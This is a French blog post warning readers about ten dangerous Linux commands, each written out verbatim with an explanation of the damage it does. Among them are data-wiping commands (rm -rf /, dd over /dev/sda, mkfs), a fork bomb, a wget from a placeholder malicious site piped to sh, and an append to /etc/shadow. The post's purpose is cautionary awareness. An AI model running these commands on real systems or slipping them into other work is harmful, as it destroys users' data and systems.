Étoiles d'élite
Étoiles d'élite
  • Jan 8, 2025
  • 60 min read

Les 10 commandes Linux les plus dangereuses

Dans le monde Linux, la ligne de commande peut être un outil puissant, nous offrant un contrôle inégalé sur nos systèmes.

Mais un grand pouvoir implique de grandes responsabilités.

Procédez avec prudence

Avertissement massif : ces commandes peuvent potentiellement effacer vos données, faire planter votre système ou vous verrouiller définitivement.

Si vous êtes curieux de savoir comment fonctionnent ces commandes, utilisez toujours une machine virtuelle ou un système isolé.

Mais si tout cela vous satisfait, regardons d’un peu plus près ces commandes périlleuses.

10 commandes Linux les plus dangereuses

Suppression récursive

Terminal window
rm -rf /

Bien que la commande rm semble simple et utile, cette variante est l’une des commandes Linux les plus tristement célèbres, comme _rm -rf / _, supprime récursivement tout du répertoire racine.

L’utilisation de cette commande peut essentiellement effacer l’intégralité de votre système d’exploitation, grâce aux indicateurs -r (récursif) et -f (force).

Les distributions Linux modernes ont même des protections intégrées pour éviter cela, mais la sensibilisation est essentielle pour éviter un désastre.

La bombe à fourche

Terminal window
:(){ :|:& };:

La bombe fork est une petite fonction shell récursive qui peut mettre votre ordinateur à genoux.

Cela crée une avalanche de processus, surchargeant votre CPU et votre mémoire.

Bien qu’elle soit parfois utilisée comme une farce, l’exécution de cette commande peut arrêter votre système, nécessitant un redémarrage.

Écraser le disque avec des zéros

Terminal window
dd if=/dev/zero of=/dev/sda

La commande dd, souvent appelée « destructeur de disque », peut écraser votre disque principal avec des zéros.

L’exécuter effacera tout, rendant votre système impossible à démarrer.

Manipulez toujours dd avec une extrême prudence et assurez-vous d’avoir une sauvegarde prête.

Format du système de fichiers

Terminal window
mkfs.ext4 /dev/sda

La commande mkfs.ext4 est utilisée pour formater un lecteur, effaçant ainsi toutes les données qu’il contient.

Bien que cela soit crucial pour préparer de nouveaux disques, il est essentiel de revérifier le périphérique pour éviter des erreurs irréversibles.

Écrasement de fichiers avec rien

Terminal window
> important_file

L’utilisation d’un opérateur de redirection vide peut effacer le contenu d’un fichier.

L’écrasement de fichiers critiques, tels que les fichiers de configuration ou système, peut rendre votre système inutilisable. Soyez toujours vigilant avec les opérateurs de redirection.

Déplacer les fichiers vers le trou noir

Terminal window
mv /important-directory /dev/null

Les fichiers déplacés vers /dev/null disparaissent à jamais, ce qui signifie qu’il s’agit d’un outil pratique pour supprimer les sorties indésirables, mais l’envoi par erreur de données vitales là-bas peut entraîner une perte permanente .

Supprimer les autorisations sur le répertoire racine

Terminal window
chmod -R 000 /

L’exécution de chmod avec l’indicateur -R et tous les zéros dans le répertoire racine supprime toutes les autorisations, vous bloquant ainsi l’accès à votre système.

Il est important d’utiliser chmod judicieusement et d’éviter de cibler le répertoire racine.

Modifier la propriété du répertoire racine

Terminal window
chown -R user:user /

Changer la propriété du répertoire racine peut interrompre les services système qui reposent sur des autorisations spécifiques, empêchant potentiellement le démarrage du système.

Soyez très prudent de cibler les bons fichiers lorsque vous utilisez chown.

Exécution de scripts non vérifiés

Terminal window
wget http://malicious-site -O- | sh

Récupérer et exécuter des scripts à partir du Web avec wget et les transférer directement dans sh comporte de nombreux risques.

Ces scripts peuvent contenir des logiciels malveillants, supprimer des fichiers importants ou ouvrir des portes dérobées.

Alors, regardez toujours les scripts avant leur exécution.

Modification des fichiers de mots de passe système

Terminal window
echo "malicious code" >> /etc/shadow

Le fichier /etc/shadow stocke les mots de passe cryptés et l’ajout de données incorrectes peut le corrompre, bloquant ainsi tous les utilisateurs, y compris root.

Cela devrait donc aller de soi, mais gérez les fichiers système critiques avec une extrême prudence.

Serveur Technologie

Cet article était-il utile?

Articles connexes